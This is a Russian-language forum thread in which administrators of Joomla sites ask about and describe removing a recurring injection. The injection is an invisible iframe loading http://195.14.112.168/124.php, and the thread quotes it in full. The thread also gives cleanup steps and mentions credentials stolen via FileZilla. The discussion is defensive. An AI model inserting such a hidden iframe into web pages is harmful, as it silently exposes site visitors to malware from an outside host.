Помогите, пожалуйста. <iframe width="468" height="60" src="http://195.14.112.168/124.php" и т.д.

Каждое утро на сайте возникает одна и та же проблема. Он останавливает свою работу. И ругается на строчку ошибка Parse error: syntax error, unexpected '<' in /home/rospoets/rospoets.ru/docs/index.php on line 88.
Естественно, захожу туда и в самом конце после ?> вижу эту строчку:
<iframe width="468" height="60" src="http://195.14.112.168/124.php" style="top:0px; position:relative; border:0px; right:-550px; opacity:0; -moz-opacity:0;filterrogid:dxImageTransform.Microsoft.Alpha(opacity=0)"></iframe>

Удаляю.

Далее идет ссылка на такой же index.php на уже в joomla/libraries

Удаляю.

Третим этапом ссылка на такую же строку в модуле mainmenu/tmpl, но уже в файле default.php

Еще раз удаляю. Сайт начинает функционировать.
Но на следующее утро всё повторяется по новой. Возможно, это происходит поздно вечером предыдущего дня, точно не могу сказать.
Я в этом деле получайник, сам администрирую сайт, сам же руковожу проектом.
Будьте добры, помогите.

 

Почитал. Фаерволл у меня установлен, индексы базы данных заменены еще в момент переноса сайта на домен. Практически всё, что там написано, у меня сделано еще в самом начале работы по инструкциям Евгения Попова.
Но эта ошибка возникла всего десять дней назад. Это сайт огромной организации, у которой, естественно, есть недруги, друзья. Если бы какому-то хакеру понадобилось испортить нам жизнь, они сделали бы это покруче.

 

У меня такая проблема стала в пятницу 22 Апреля: На одном хостинге выскакивало сообщение про ошибку в строке, другой хостинг закрыл сайты полностью.
Перед праздниками разбираться времени не было, поэтому решал проблему в лоб:
- Залил каждый сайт на свой комп
- Поиском (я пользую PSPad Editor) все файлы в папке сайта, содержащие зловред - " <iframe...... Alpha(opacity=0)"> " (рекомендую сначала проверить общее количество файлов с упоминанием 195.14.112.168) и заместил пробелом.
- Перезалил на хостинг.
Зловред прописывается в файлах .htm и .php.
Соответственно, разное количество зараженных файлов в зависимости размера сайта: у меня вышло от 130 до 1020 файлов!
Все сайты восстановились, бан словить вроде не успел?!
Сейчас хостер смотрит логи - может где остались следы зловреда.
По мнению хостеров пароли слились через FileZilla (кто-то утянул через него все пароли), поэтому лучше еще раз проверить своего клиента и не перзаливать подчищенные сайты с помощью него же....

Работки на пол-часа у тебя есть если мой хостер даст еще рекомендации - отпишусь...